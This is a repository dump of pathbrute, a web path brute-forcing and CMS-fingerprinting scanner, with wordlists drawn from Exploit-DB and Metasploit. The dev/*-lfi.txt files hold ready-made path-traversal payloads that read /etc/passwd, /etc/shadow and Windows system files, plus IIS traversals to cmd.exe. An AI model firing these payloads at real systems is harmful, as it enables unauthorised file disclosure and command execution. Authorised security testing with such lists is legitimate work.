├── .gitignore ├── Dockerfile ├── dev ├── exploitdb_perl-lfi.txt ├── exploitdb_asp-lfi.txt ├── exploitdb_jsp-lfi.txt ├── exploitdb_win-lfi.txt ├── exploitdb_cgi-lfi.txt └── sqlPaths.txt ├── goreleaser.yml ├── exploitdb_perl.txt ├── exploitdb_aspx.txt ├── exploitdb_cfm.txt ├── README.md ├── msfPaths.txt ├── exploitdb_others.txt ├── exploitdb_jsp.txt ├── exploitdb_cgi.txt ├── exploitdb_asp.txt └── defaultPaths.txt /.gitignore: -------------------------------------------------------------------------------- 1 | build.sh 2 | build1.sh 3 | buildTest.py 4 | -------------------------------------------------------------------------------- /Dockerfile: -------------------------------------------------------------------------------- 1 | FROM debian:jessie-slim 2 | RUN apt-get update 3 | RUN apt-get install -y ca-certificates 4 | ADD pathBrute_linux / 5 | -------------------------------------------------------------------------------- /dev/exploitdb_perl-lfi.txt: -------------------------------------------------------------------------------- 1 | ./44386.txt:/cgi-bin/downloadsys.pl?ID=../../../../etc/passwd 2 | ./37126.txt:/learn/cubemail/install.php?language=../../../../../../../../../../../../../../../../../etc/passwd%00 3 | 4 | -------------------------------------------------------------------------------- /goreleaser.yml: -------------------------------------------------------------------------------- 1 | build: 2 | main: ./pathBrute.go 3 | goos: 4 | - linux 5 | - darwin 6 | - windows 7 | goarch: 8 | - 386 9 | - amd64 10 | - arm 11 | - arm64 12 | brew: 13 | github: 14 | owner: milo2012 15 | name: homebrew-tap 16 | folder: Formula 17 | -------------------------------------------------------------------------------- /exploitdb_perl.txt: -------------------------------------------------------------------------------- 1 | /scripts/parseClickLogs.pl 2 | /scripts/conf.txt 3 | /croogo/admin/users 4 | /croogo/admin/users/delete/2/token 5 | /croogo/admin/roles 6 | /croogo/admin/roles/delete 7 | /learn/cubemail/install.php 8 | /metadot/index.pl 9 | /cgi-bin/routers2.pl 10 | /dvp100/confd/docroot/cgi-bin/ 11 | /cgi-bin/downloadsys.pl 12 | 13 | -------------------------------------------------------------------------------- /exploitdb_aspx.txt: -------------------------------------------------------------------------------- 1 | /Calendar/CalendarActions.aspx 2 | /Checkbox/Login.aspx 3 | /Checkbox/Upload.ashx 4 | /Checkbox/ViewContent.aspx 5 | /Data/Reports/ReferringURLsWithQueries 6 | /FileExplorer/Explorer.aspx 7 | /Mum.Geo.Services/DataAccessService.svc 8 | /Mum.Geo.Services/IO.svc 9 | /Scanning/report.aspx 10 | /Software/report.aspx 11 | /Telerik.Web.UI.WebResource.axd 12 | /Uploads/Documents/cmd.aspx 13 | /human.aspx 14 | /microixcloud/ 15 | /secmail/getmessage.exe 16 | /secserver/securectrl.exe 17 | /secupload2/upload.aspx 18 | -------------------------------------------------------------------------------- /dev/exploitdb_asp-lfi.txt: -------------------------------------------------------------------------------- 1 | ./webapps/25853.txt:/gallery/folderview.asp?folder=Sport+Champions/../../../../../../../../winnt/repair 2 | ./webapps/4921.txt:/webmail-pro-net/download_view_attachment.aspx?temp_filename=../../../../../../../../../../../../../../../../../../boot.ini 3 | ./webapps/34936.txt:/igallery41/streamfile.asp?i=./../../../index.asp&f=subdir 4 | ./webapps/23326.txt:/NetDemo2/OpenFile.aspx?file=../../../../../../../../boot.ini 5 | ./webapps/23326.txt:/NetDemo2/html.aspx?file=../../../../../../../../../boot.ini 6 | ./webapps/3831.txt:/download.asp?File=../../../../etc/passwd&pt=zip 7 | ./webapps/15018.txt://Services/FileService.ashx?cmd=movefile&srcPath=./../../../user.config&destPath=./../../../user.config.aaa 8 | ./webapps/15018.txt:/Services/FileService.ashx?cmd=movefile&srcPath=./../../../user.config&destPath=./../../../user.config.aaa"; 9 | ./webapps/23635.txt:/sample_script_directory/Sample_showcode.html?fname=/../../../../etc/passwd 10 | ./webapps/9612.txt:/?ChartDirectorChartImage=chart_WebChartViewer1&cacheId=/../../../../../../../../windows/win.ini 11 | ./webapps/9562.txt:/scales_static_resource.jsf?file=../../../../../../etc/passwd 12 | -------------------------------------------------------------------------------- /exploitdb_cfm.txt: -------------------------------------------------------------------------------- 1 | /con.cfm 2 | /aux.cfm 3 | /com1.cfm 4 | /com2.cfm 5 | /www/tasks/render/file/ 6 | /dsp_page.cfm 7 | /docs/showtemp.cfm 8 | /instaboard/index.cfm 9 | /CFIDE/probe.cfm 10 | /article.cfm 11 | /admin/adduser.cfm 12 | /forum/forum.cfm 13 | /forums/index.cfm 14 | /index.cfm 15 | /view_archive.cfm 16 | /view_forum.cfm 17 | /view_thread.cfm 18 | /book.cfm 19 | /search/index.cfm 20 | /document/docWindow.cfm 21 | /printer_friendly.cfm 22 | /show.cfm 23 | /CategoryResults.cfm 24 | /viewEvent.cfm 25 | /news/newsView.cfm 26 | /mainCal.cfm 27 | /local.cfm 28 | /Results.cfm 29 | /index.cfm 30 | /forum/include/error/autherror.cfm 31 | /forum/include/common/comfinish.cfm 32 | /blog/forum/include/error/autherror.cfm 33 | /CFIDE/wizards/common/_authenticatewizarduser.cfm 34 | /CFIDE/administrator/logviewer/searchlog.cfm 35 | /CFIDE/wizards/common/_logintowizard.cfm 36 | /CFIDE/administrator/enter.cfm 37 | /commonspot/utilities/longproc.cfm 38 | /archives.cfm/search/ 39 | /page.cfm 40 | /admin/index.cfm 41 | /default/error/index.cfm 42 | /admin/date_picker/dsp_dp_showmonth.cfm 43 | /admin/date_picker/index.cfm 44 | /Admin/index.cfm 45 | /admin/view/layouts/compact.cfm 46 | /admin/view/layouts/template.cfm 47 | /admin/view/vAdvertising/dsp_editCreative.cfm 48 | /admin/view/vAdvertising/dsp_editIPWhiteList.cfm 49 | /admin/view/vAdvertising/dsp_editPlacement.cfm 50 | /admin/view/vAdvertising/dsp_listAdZones.cfm 51 | /admin/view/vAdvertising/dsp_listAdvertisers.cfm 52 | /admin/view/vAdvertising/dsp_listCampaigns.cfm 53 | /admin/view/vAdvertising/dsp_listCreatives.cfm 54 | /admin/view/vAdvertising/dsp_viewReportByCampaign.cfm 55 | /admin/view/vAdvertising/dsp_viewReportByPlacement.cfm 56 | /admin/view/vArchitecture/form/dsp_tab_related_content.cfm 57 | /admin/view/vDashboard/dsp_sessionSearch.cfm 58 | /admin/view/vDashboard/dsp_topContent.cfm 59 | /admin/view/vDashboard/dsp_topRated.cfm 60 | /admin/view/vDashboard/dsp_topReferers.cfm 61 | /admin/view/vDashboard/dsp_topSearches.cfm 62 | /admin/view/vEmail_Broadcaster/dsp_form.cfm 63 | /admin/view/vEmail_Broadcaster/dsp_list.cfm 64 | /admin/view/vExtend/dsp_attribute_form.cfm 65 | /admin/view/vExtend/dsp_editAttributes.cfm 66 | /admin/view/vExtend/dsp_listSets.cfm 67 | /admin/view/vExtend/dsp_listSubTypes.cfm 68 | /admin/view/vFeed/ajax/dsp_loadSite_old.cfm 69 | /admin/view/vFeed/dsp_list.cfm 70 | /admin/view/vMailingList/dsp_form.cfm 71 | /admin/view/vMailingList/dsp_list_members.cfm 72 | /admin/view/vPrivateUsers/dsp_group.cfm 73 | /admin/view/vPrivateUsers/dsp_secondary_menu.cfm 74 | /admin/view/vPrivateUsers/dsp_user.cfm 75 | /admin/view/vPrivateUsers/dsp_userprofile.cfm 76 | /admin/view/vPublicUsers/dsp_group.cfm 77 | /admin/view/vPublicUsers/dsp_user.cfm 78 | /admin/view/vSettings/dsp_plugin_form.cfm 79 | /default/includes/display_objects/calendar/dsp_dp_showmonth.cfm 80 | /default/includes/display_objects/custom/fuseboxtemplates/noxml/view/layout/lay_template.cfm 81 | /default/includes/display_objects/custom/fuseboxtemplates/xml/view/display/dsp_hello.cfm 82 | /default/includes/display_objects/custom/fuseboxtemplates/xml/view/layout/lay_template.cfm 83 | /default/includes/email/inc_email.cfm 84 | /default/includes/themes/merced/templates/inc/header.cfm 85 | /default/includes/themes/merced/templates/inc/ie_conditional_includes.cfm 86 | /default/utilities/sendtofriend.cfm 87 | /requirements/mura/geoCoding/index.cfm 88 | /wysiwyg/editor/plugins/selectlink/fck_selectlink.cfm 89 | /activeweb/EasyEdit.cfm 90 | /CFIDE/componentutils/componentdetail.cfm 91 | /CFIDE/componentutils/cfcexplorer.cfc 92 | /cfchart.cfchart 93 | /tasks/feed/readRSS.cfm 94 | -------------------------------------------------------------------------------- /dev/exploitdb_jsp-lfi.txt: -------------------------------------------------------------------------------- 1 | ./38395.txt:/workorder/FileDownload.jsp?module=support&fName=..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00 2 | ./23872.txt:/support/download.jsp?filename=..%2F ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow 3 | ./35222.txt:/tmui/Control/form 4 | ./17442.txt:/workorder/FileDownload.jsp?FILENAME=passwd&module=Request&ID=1&path=..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&delete=false 5 | ./17442.txt:/workorder/FileDownload.jsp?FILENAME=shadow&module=Request&ID=1&path=..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow&delete=false 6 | ./35127.txt:/report/reportViewAction.jsp?selection=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini 7 | ./42438.txt:/Esprit/public/Password.jsp?orgName=../../../../../../../../../etc/passwd 8 | ./42438.txt:/Esprit/ES/Login?orgUnitName=../../../../../../../../../etc/passwd 9 | ./42438.txt:/dalimws/log?file=../../../../../../../etc/passwd&len=10000&download=true 10 | ./39667.txt:/../../../../../WEB-INF/web.xml 11 | ./24786.txt:/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../../etc/passwd 12 | ./24786.txt:/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../../etc/shadow 13 | ./37260.txt:/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=Windows/system.ini 14 | ./37260.txt:/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=etc/passwd 15 | ./40229.txt/servlets/FetchFile?fileName=../../../etc/shadow 16 | ./32368.txt/servlet/downloadReport?reportFileName=../../../../../../../../etc/passwd&format=CSV 17 | ./34518.txt/statusUpdate?actionToCall=LFU&customerId=1337&fileName=../../../../../../shell.jsp&configDataID=1 18 | ./42402.rb:path = "../../../../../../../../../../Program%20Files\\Advantech\\SUSIAccess%203.0%20Server\\Setting.xml" 19 | ./42402.rb:path = "../../../../../../../../../../Program Files\\Apache Software Foundation\\logs\\" 20 | ./39142.txt:--data-binary $'key=foo&request=getUpgradeStatus&file=%2Ffloodguard%2Freports%2F../../../../../etc/shadow' \ 21 | ./39142.txt:key=validkey&request=download&download=%2Ffloodguard%2Fdata%2F../../../../../../etc/shadow&updLaterThan=0&head=0&start=0&limit=4950&remote=www.example.com 22 | ./39142.txt:key=validkey&request=port_svc&download=%2Ffloodguard%2Fdata%2F../../../../../../../etc/shadow&updLaterThan=0&remote=www.example.com 23 | ./39142.txt:--data-binary $'key=validkey&binfile=%2Fourlogs%2F../../../../../../../../../etc/shadow 24 | ./35181.txt:/servlet/ConsoleServlet?ActionType=/../../../../../../../../../../WINDOWS/win.ini%00 25 | ./39143.txt:--data-binary $'key=validkey&falconConfig=getfile&file=%2Ffloodguard%2F../../../../../../../../../etc/shadow' \ 26 | ./35222.txt:/tmui/Control/jspmap/tmui/system/archive/properties.jsp?&name=../../../../../etc/passwd 27 | ./35222.txt:/tmui/Control/jspmap/tmui/system/archive/properties.jsp?name=../../../../../etc/passwd 28 | ./31445.txt:/elasticpath_dir/manager/getImportFileRedirect.jsp?type=mapping&file=../../../../../boot.ini 29 | ./5112.txt:/JSPWiki/Edit.jsp?page=Main&editor=../../../rss 30 | ./5112.txt:/JSPWiki/Edit.jsp?page=User&editor=../../../Install 31 | ./5112.txt:/JSPWiki/Edit.jsp?page=User&editor=../../../admin/SecurityConfig 32 | ./7075.txt:/setup/setup-/../../log.jsp?log=info&mode=asc&lines=All 33 | ./31446.txt:/elastic/manager/fileManager.jsp?dir=../../../../WINDOWS/system32/config/ 34 | ./37441.txt:/ssgmanager/ssgimages?name=../../../../../etc/shadow 35 | ./35127.txt:/report/reportViewAction.jsp?selection=../../../../../../../../../../windows/win.ini 36 | -------------------------------------------------------------------------------- /dev/exploitdb_win-lfi.txt: -------------------------------------------------------------------------------- 1 | ./20301.php:/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+ 2 | ./20301.php:/iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+ 3 | ./20301.php:/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+ 4 | ./20302.pl:/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+ 5 | ./20302.pl:/MSADC/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+ 6 | ./20302.pl:/msadc/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+ 7 | ./20302.pl:/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+ 8 | ./20302.pl:/PBServer/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+ 9 | ./20302.pl:/Rpc/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+ 10 | ./20302.pl:/samples/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+ 11 | ./20302.pl:/cgi-bin/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+ 12 | ./20302.pl:/iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+ 13 | ./20302.pl:/_mem_bin/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+ 14 | ./20302.pl:/_mem_bin/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+ 15 | ./20302.pl:/_vti_bin/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+ 16 | ./20302.pl:/_vti_bin/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+ 17 | ./20838.c:/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+ 18 | ./20301.php:/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+ 19 | ./20301.php:$vector_ataque[11]="/MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+ 20 | ./20301.php:/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+ 21 | ./20301.php:/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+ 22 | ./20301.php:/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+ 23 | ./20301.php:/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+ 24 | ./20301.php:/samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+ 25 | ./20301.php:/cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+ 26 | ./20301.php:/_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+ 27 | ./20301.php:/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+ 28 | ./20302.pl:/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+ 29 | ./20302.pl:/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+ 30 | ./20302.pl:/MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+ 31 | ./20302.pl:/MSADC/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+ 32 | ./20302.pl:/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+ 33 | ./20302.pl:/msadc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+ 34 | ./20302.pl:/scripts/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+ 35 | ./20302.pl:/scripts/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+ 36 | ./20302.pl:/PBServer/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+ 37 | ./20302.pl:/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+ 38 | ./20302.pl:/Rpc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+ 39 | ./20302.pl:/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+ 40 | ./20302.pl:/samples/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+ 41 | ./20302.pl:/samples/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+ 42 | ./20302.pl:/_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+ 43 | ./20302.pl:/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+ 44 | ./20302.pl:/_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+ 45 | ./20302.pl:/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+ 46 | ./20302.pl:/cgi-bin/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+ 47 | ./20302.pl:/cgi-bin/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+ 48 | ./20302.pl:/cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+ 49 | ./20302.pl:/iisadmpwd/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+ 50 | ./20302.pl:/includes/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+ 51 | ./20302.pl:/_mem_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+ 52 | ./20302.pl:/_mem_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+ 53 | ./20302.pl:/_mem_bin/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+ 54 | ./20302.pl:/_mem_bin/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+ 55 | ./20302.pl:/_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+ 56 | ./20302.pl:/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+ 57 | ./20302.pl:/_vti_bin/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+ 58 | ./20302.pl:/_vti_bin/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+ 59 | -------------------------------------------------------------------------------- /dev/exploitdb_cgi-lfi.txt: -------------------------------------------------------------------------------- 1 | ./24723.txt:/scripts/mailpost.exe/..%255c..%255c..%255cwinnt/system.ini?*nosend*=&email=test@procheckup.com 2 | ./4261.txt:/showpage.cgi?p=../../../../../../etc/passwd 3 | ./21558.txt/cgi-bin/magiccard.cgi?pa=preview&next=custom&page=../../../../../../../../../../etc/passwd 4 | ./9140.txt:/cgi-bin/DJcalendar.cgi?TEMPLATE=/../../../../../../../etc/passwd 5 | ./23615.txt/directory/PJreview_Neo.cgi?p=/../../../../../../../../../../../../../../../../etc/passwd 6 | ./25649.txt/ShowAlbum?ShowDetails&1&nocount&/../../../../../../../../../..//etc/passwd 7 | ./25649.txt/ShowVideo?1&fullnocount&/../../../../../../../../../..//etc/passwd 8 | ./25649.txt/ShowGraphic?/../../../../../../../../etc/passwd 9 | ./9357.txt:/cgi-bin/perlshop.cgi?ACTION=ENTER%20SHOP&thispage=../../../../../../../../etc/passwd&ORDER_ID=%21ORDERID%21&LANG=english&CUR=dollar 10 | ./4529.txt:/cgi-bin/wxis.exe/iah/?IsisScript=../../../../../../../../../etc/passwd 11 | ./24591.txt/cgi-bin/pdesk.cgi?lang=../../../../../../../proc/version%00 12 | ./21979.txt/cgi-bin/ion-p?page=../../../../../etc/hosts 13 | ./23613.txt/directory/blog.cgi?submit=ViewFile&month=[month]&year=[year]&file=/../../../../../../../../../../../../../../../../etc/passwd 14 | ./22337.txt:/logbook.pl?file=../../../../../../../bin/cat%20logbook.pl%00 15 | ./34794.txt/cgi-bin/read.cgi?page=../../../../../../../../../../../etc/passwd%00 16 | ./27163.txt/pkmslogout?filename=../../../../../../../etc/passwd 17 | ./18153.txt:Cookie: sessionID=1;KohaOpacLanguage=../../../../../../../../etc/passwd%00 18 | ./26914.txt/server.np?base&site=XXXintra&catalog=catalog&template=../../../../../../../../../boot.ini 19 | ./22743.txt:/cgi-bin/imagefolio/admin/admin.cgi?cgi=remove.pl&uid=111.111.111.111&rmstep=2&category=../../../../../../../../../../../etc/passwd 20 | ./22592.txt:/shop/normal_html.cgi?file=../../../../../../etc/issue%00 21 | ./23706.txt/directory/genindexpage.cgi?13687+Home+/../../../../../../../../../../../../../../../../etc/passwd 22 | ./2266.txt/scripts/cbag/ag.exe?page=FileDownload&id=../../../../../../../../../../../../../inetpub/scripts/cbag/cb5/data/admin¬imecard=1&type=text&subtype=html&ct=1 23 | ./2266.txt/scripts/s360v2/s360.exe?page=FileDownload&id=../../../../../../../../../../inetpub/scripts/s360v2/s360v2/data/admin&type=text&subtype=plain&ct=1&.txt 24 | ./2266.txt/scripts/s360v2/s360.exe?page=MessageDownload&mid=37&id=../../../../../../../../../../inetpub/scripts/s360v2/s360v2/data/admin&bc=1&type=text&subtype=plain&ct=1&.txt 25 | ./23894.txt/cloisterblog/journal.pl?syear=2004&sday=11&smonth=../../../../../../../../etc/passwd%00 26 | ./23705.txt/directory/gotopage.cgi?13686+/../../../../../../../../../../../../../../../../etc/passwd 27 | ./17259.txt:/cgi-bin/ffileman.cgi?direkt=../../../../../../../../&kullanici=[username]&sifre=[password]&dizin_git=Vai%20alla%20Directory 28 | ./23467.txt/quikstore.cgi?category=blah&template=../../../../../../../../../../etc/passwd%00.html 29 | ./23467.txt/quikstore.cgi?category=blah&template=../../../../../../../../../../../../etc/hosts 30 | ./23467.txt/quikstore.cgi?category=blah&template=../../../../../../../../../../../../usr/bin/id 31 | ./30199.txt/webif/webif.cgi?cmd=query&config=conf_2000/config.txt&outconfig=../../../../etc/issue 32 | ./33334.txt:/cgi-bin/help/doIt.cgi 33 | ./33334.txt:/cgi-bin/help/doIt.cgi?FUNC=load_xml_file&xml_path=../../../../../../../../../../etc/passwd 34 | ./27141.txt/cgi-bin/e-cms/vis/vis.pl?s=001&p=../../../../etc/passwd%00 35 | ./27141.txt/cgi-bin/e-cms/vis/vis.pl?s=../../../../etc/passwd%00 36 | ./4977.txt:/archiv.cgi?list=&file=Newsletter-HtmlNachricht.save&template=../../../../../../etc/passwd&link=%3C%3C%3C%3C 37 | ./15737.txt:/session.cgi?sid=3456434387-0000000003&app=urchin.cgi&action=prop&rid=13&n=10&vid=1102&dtc=0&cmd=svg&gfid=../../../../../../../../../../etc/passwd&ie5=.svg 38 | ./24703.txt/lstat/lstat.cgi?obj=wg104&template=../../../../../../../../etc/passwd&from=-1m&to=now 39 | ./3412.txt:http://$target/cgi-bin/rb.cgi?mode=page&file=../../../../../../../../etc/passwd 40 | ./23085.html:value="../../../../../../../../../../etc/passwd"> 41 | ./25632.txt:/cgi-bin/emsgb/easymsgb.pl?print=../../../../../../../../etc/passwd 42 | ./5304.txt/cgi-bin/his-webshop.pl?t=../../../../../../../../etc/passwd%00 43 | ./34918.txt:/preauth/login.cgi?realm=../../../etc/hosts 44 | ./22377.txt/k/home?dir=/&file=../../../../../../../../etc/passwd&lang=kor 45 | ./22015.txt:viewAttachment.cgi?file=../../../../../etc/passwd 46 | ./31025.txt/index.cgi?page=../../../../../../../../etc/passwd%00 47 | ./6509.txt:/twiki/bin/configure?action=image;image=../../../../../../../etc/passwd;type=text/plain 48 | ./36994.txt/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd 49 | ./44361.rb:/api/homematic.cgi 50 | ./11723.pl:/cgi-bin/ttx.cgi?cmd=file&fn=../../../../../../etc/passwd 51 | ./21966.txt/cgi-bin/mail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd%00 52 | ./23395.txt:/index.cgi?page=../../../../../../../../etc/passwd 53 | ./25041.txt/cgi-bin/eboard40/index2.cgi?frames=yes&board=demo&mode=Current&threads=Collapse&message=../../../../../../../../../../../etc/passwd%00 54 | ./39871.txt/scr.cgi?fname=../../../../../etc/passwd%00&status= 55 | ./15130.sh:/cgi-mod/view_help.cgi?locale=/../../../../../../../mail/snapshot/config.snapshot%00 56 | ./6269.txt:/bin/configure?action=image;image=../../../../../../etc/passwd 57 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # pathbrute 2 | Pathbrute 3 | 4 | Pathbrute is a DirB/Dirbuster type of tool designed to brute force directories and files names on web/application servers. 5 | However, it has some new tricks. It is no longer a dumb directories/files brute force tool if you use the -v and -i option. 6 | 7 | It runs on Windows/Linux/OSX operating systems and on ARM/ARM64/x86/x64 processors. 8 | 9 | Some of it includes: 10 | 1) Wordlists from Exploit databases and Metasploit 11 | 2) Identify interesting URLs eventhough websites return HTTP status code 200 for all URI paths. 12 | 3) Identify valid paths that require authentication (HTTP status code 401) 13 | 4) Reduce the number of results for wordlists with URI paths with nested directories (See https://github.com/milo2012/pathbrute/issues/1 for more information) 14 | 15 | Pathbrute has a number of wordlists from metasploit/exploit-database and other sources that it uses to discover interesting content on servers. 16 | 17 | pathBrute contains/uses a number of self compiled wordlists for identifying “interesting” content and potentially vulnerable websites. 18 | 1) More than 18571 URI paths from Exploit-Database 19 | 2) More than 400 URI paths from Metasploit Framework 20 | 21 | pathBrute can also use wordlists from other sources if you prefer. 22 | pathBrute can also be used for identifying if any type of CMS (Joomla, WordPress and Drupal) is running on the target websites and fingerprint the versions of the CMS using the –cms option. 23 | 24 | Binaries for different platforms and architectures are available in the the release section. 25 | 26 | **Please check RELEASE section for compiled executables** 27 | 28 | ``` 29 | $ ./pathBrute -h 30 | Options: 31 | 32 | -h, --help display help information 33 | -U, --filename File containing list of websites 34 | -u, --url Url of website 35 | -P, --Paths File containing list of URI paths 36 | -p, --path URI path 37 | -s, --source Path source (default | msf | exploitdb | exploitdb-asp | exploitdb-aspx | exploitdb-cfm | exploitdb-cgi | exploitdb-cfm | exploitdb-jsp | exploitdb-perl | exploitdb-php | exploitdb-others | RobotsDisallowed | SecLists) 38 | -n, --threads No of concurrent threads (default: 2) 39 | -c Status code 40 | -i Intelligent mode 41 | -v, --verbose Verbose mode 42 | --cms Fingerprint CMS 43 | -x Test a URI path across all target hosts instead of testing all URI paths against a host before moving onto next host 44 | -l, --log Output to log file 45 | -r Resume from x as in [x of 9999] 46 | --pHost IP of HTTP proxy 47 | --pPort Port of HTTP proxy (default 8080) 48 | --ua Set User-Agent 49 | --timeout Set timeout to x seconds 50 | --update Update URI path wordlists from Github 51 | --skip Skip sites that don't give any useful results (e.g. OWA, VPN, etc) 52 | ``` 53 | *** 54 | 55 | # Building With Docker 56 | ``` 57 | - Building from Dockerfile 58 | docker build -t example-scratch -f Dockerfile 59 | docker run -it 2af3eecdb017 /pathBrute_linux -u http://testphp.vulnweb.com/ -s default -v -i -n 20 60 | 61 | - Pull latest Docker image 62 | docker pull milo2012/pathbrute 63 | docker run -it 589606bdc12a /pathBrute_linux -u http://testphp.vulnweb.com/ -s default -v -i -n 20 64 | 65 | ``` 66 | *** 67 | 68 | # Manual Build 69 | ``` 70 | git clone https://github.com/milo2012/pathbrute.git 71 | go get github.com/mkideal/cli 72 | go get github.com/badoux/goscraper 73 | go get github.com/fatih/color 74 | go github.com/hashicorp/go-version 75 | go build pathBrute.go 76 | ``` 77 | *** 78 | 79 | # Example 80 | ``` 81 | ./pathBrute -s default -f urls.txt -v -i -n 25 82 | [*] Getting Default Page Title for Invalid URI Paths 83 | http://xxxx.com/xxx [404] [404 Not Found] 84 | 85 | [*] Testing URI Paths 86 | http://xxxx.com/AdminRealm [404] [168] [404 Not Found] 87 | http://xxxx.com/AddressBookJ2WE/services/AddressBook/wsdl/ [404] [168] [404 Not Found] 88 | http://xxxx.com/AdminJDBC [404] [168] [404 Not Found] 89 | http://xxxx.com/AdminMain [404] [168] [404 Not Found] 90 | http://xxxx.com/Admin [404] [168] [404 Not Found] 91 | http://xxxx.com/AdminProps [404] [168] [404 Not Found] 92 | http://xxxx.com/AddressBookJ2WB [404] [168] [404 Not Found] 93 | http://xxxx.com/AE/index.jsp [404] [168] [404 Not Found] 94 | http://xxxx.com/.web [404] [168] [404 Not Found] 95 | http://xxxx.com/ADS-EJB [200] [482] [] 96 | 97 | [Found] https://127.0.0.1/.gitignore [200] [28] [] 98 | [Found] https://127.0.0.1/.htaccess [200] [1164] [] 99 | [Found] https://127.0.0.1/PMA/ [200] [8575] [phpMyAdmin] 100 | [Found] https://127.0.0.1/.htaccess [200] [1164] [] 101 | ``` 102 | *** 103 | 104 | # Explanation of the output from pathBrute 105 | ``` 106 | https://208.88.199.241/sap/bc/webdynpro/sap/wdr_test_gantt [401] [458] [File or directory not found] [27736 of 38988] 107 | ``` 108 | Below is a description of the output from pathBrute 109 | 110 | **[401]** - refers to the HTTP status code 111 | **[458]** - refers to the size of the HTTP response 112 | **[File or directory not found]** - refers to the title of the page 113 | **[27736 of 38988]** - refers to the current position in the list 114 | 115 | *** 116 | 117 | #Example using the --cms option 118 | Below is a sample output when using the --cms option to fingerprint the CMS on the target hosts. It also returns the Metasploit modules based on the version of the CMS software. 119 | 120 | ``` 121 | $ /git/pathbrute/pathBrute -U urls.txt --cms -i -v 122 | [...redacted for brevity...] 123 | 124 | [Found] https://[redacted] [Wordpress 4.8.6] 125 | 126 | [Found] https://[redacted] [Wordpress 